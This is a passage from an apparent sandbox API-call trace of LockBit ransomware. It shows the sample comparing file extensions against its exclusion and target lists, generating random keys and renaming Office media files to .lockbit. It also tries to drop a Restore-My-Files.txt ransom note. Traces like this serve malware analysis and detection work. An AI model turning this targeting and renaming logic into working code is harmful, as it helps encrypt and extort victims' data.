(lpString1=".prf", lpString2=".WMF") returned -1 [0197.051] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.051] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.051] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.051] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.051] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.051] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.051] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.051] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.051] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.051] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.051] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.051] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.051] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.051] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.051] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.051] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.051] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.051] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.051] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.051] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.051] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.051] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.051] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.052] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.052] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.052] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.052] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.052] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0222015.WMF") returned 1 [0197.052] lstrcmpiW (lpString1="ntldr", lpString2="J0222015.WMF") returned 1 [0197.052] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0222015.WMF") returned 1 [0197.052] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0222015.WMF") returned -1 [0197.052] lstrcmpiW (lpString1="autorun.inf", lpString2="J0222015.WMF") returned -1 [0197.052] lstrcmpiW (lpString1="thumbs.db", lpString2="J0222015.WMF") returned 1 [0197.052] lstrcmpiW (lpString1="iconcache.db", lpString2="J0222015.WMF") returned -1 [0197.052] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.052] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0222015.WMF") returned=".WMF" [0197.052] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.052] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.052] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.052] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.052] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.052] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.052] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.052] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.052] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.052] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.052] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.052] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.052] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.053] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.053] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.053] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.053] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.053] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.053] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.053] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.053] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.053] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.053] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.053] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.053] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.053] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.053] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.053] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.053] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0222015.WMF.lockbit") returned 70 [0197.053] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0222015.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0222015.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0197.055] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.056] malloc (_Size=0x40068) returned 0x3df0008 [0197.056] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1930) returned 1 [0197.056] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.056] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.056] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.057] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.057] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.057] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0197.062] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0222015.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0222015.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.062] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.062] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0197.062] free (_Block=0x1fa2ed8) [0197.062] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0222015.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.062] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.062] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.062] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7fde0800, ftCreationTime.dwHighDateTime=0x1be7a37, ftLastAccessTime.dwLowDateTime=0xbd539100, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x7fde0800, ftLastWriteTime.dwHighDateTime=0x1be7a37, nFileSizeHigh=0x0, nFileSizeLow=0x632, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0222017.WMF", cAlternateFileName="")) returned 1 [0197.063] lstrcmpiW (lpString1=".", lpString2="J0222017.WMF") returned -1 [0197.063] lstrcmpiW (lpString1="..", lpString2="J0222017.WMF") returned -1 [0197.063] PathFindExtensionW (pszPath="J0222017.WMF") returned=".WMF" [0197.063] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.063] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.063] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.063] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.063] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.063] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.063] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.063] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.063] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.063] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.063] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.063] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.063] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.063] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.063] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.063] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.063] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.063] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.063] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.063] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.063] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.063] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.063] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.064] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.064] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.064] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.064] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.064] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.064] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.064] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.064] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.064] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.064] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.064] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.064] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.064] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.064] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.064] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.064] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.064] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.064] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.064] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.064] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.064] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.064] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.064] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.064] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.064] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0222017.WMF") returned 1 [0197.064] lstrcmpiW (lpString1="ntldr", lpString2="J0222017.WMF") returned 1 [0197.064] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0222017.WMF") returned 1 [0197.065] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0222017.WMF") returned -1 [0197.065] lstrcmpiW (lpString1="autorun.inf", lpString2="J0222017.WMF") returned -1 [0197.065] lstrcmpiW (lpString1="thumbs.db", lpString2="J0222017.WMF") returned 1 [0197.065] lstrcmpiW (lpString1="iconcache.db", lpString2="J0222017.WMF") returned -1 [0197.065] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.065] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0222017.WMF") returned=".WMF" [0197.065] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.065] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.065] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.065] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.065] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.065] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.065] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.065] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.065] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.065] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.065] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.065] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.065] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.065] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.065] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.065] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.065] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.065] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.066] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.066] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.066] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.066] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.066] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.066] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.066] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.066] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.066] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.066] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.066] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0222017.WMF.lockbit") returned 70 [0197.066] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0222017.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0222017.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0197.068] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.068] malloc (_Size=0x40068) returned 0x3df0008 [0197.068] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1586) returned 1 [0197.068] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.068] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.068] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.068] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.069] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.069] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.069] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0197.074] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0222017.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0222017.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.074] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.074] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0197.074] free (_Block=0x1fa2ed8) [0197.074] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0222017.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.075] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.075] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.075] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82406200, ftCreationTime.dwHighDateTime=0x1be7a37, ftLastAccessTime.dwLowDateTime=0xbd539100, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x82406200, ftLastWriteTime.dwHighDateTime=0x1be7a37, nFileSizeHigh=0x0, nFileSizeLow=0x58e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0222019.WMF", cAlternateFileName="")) returned 1 [0197.075] lstrcmpiW (lpString1=".", lpString2="J0222019.WMF") returned -1 [0197.075] lstrcmpiW (lpString1="..", lpString2="J0222019.WMF") returned -1 [0197.075] PathFindExtensionW (pszPath="J0222019.WMF") returned=".WMF" [0197.075] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.075] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.075] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.075] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.075] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.075] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.075] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.075] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.075] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.075] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.075] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.075] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.075] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.075] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.075] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.075] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.076] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.076] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.076] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.076] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.076] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.076] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.076] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.076] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.076] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.076] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.076] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.076] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.076] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.076] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.076] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.076] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.076] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.076] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.076] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.076] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.076] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.076] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.076] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.076] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.076] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.076] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.077] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.077] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.077] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.077] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.077] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.077] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0222019.WMF") returned 1 [0197.077] lstrcmpiW (lpString1="ntldr", lpString2="J0222019.WMF") returned 1 [0197.077] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0222019.WMF") returned 1 [0197.077] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0222019.WMF") returned -1 [0197.077] lstrcmpiW (lpString1="autorun.inf", lpString2="J0222019.WMF") returned -1 [0197.077] lstrcmpiW (lpString1="thumbs.db", lpString2="J0222019.WMF") returned 1 [0197.077] lstrcmpiW (lpString1="iconcache.db", lpString2="J0222019.WMF") returned -1 [0197.077] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.077] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0222019.WMF") returned=".WMF" [0197.077] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.077] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.077] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.077] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.077] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.077] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.077] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.077] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.077] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.077] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.078] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.078] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.078] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.078] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.078] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.078] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.078] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.078] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.078] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.078] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.078] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.078] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.078] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.078] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.078] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.078] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.078] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.079] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.079] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0222019.WMF.lockbit") returned 70 [0197.079] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0222019.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0222019.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0197.081] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.081] malloc (_Size=0x40068) returned 0x3df0008 [0197.081] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1422) returned 1 [0197.081] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.082] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.082] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.082] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.082] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.083] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: 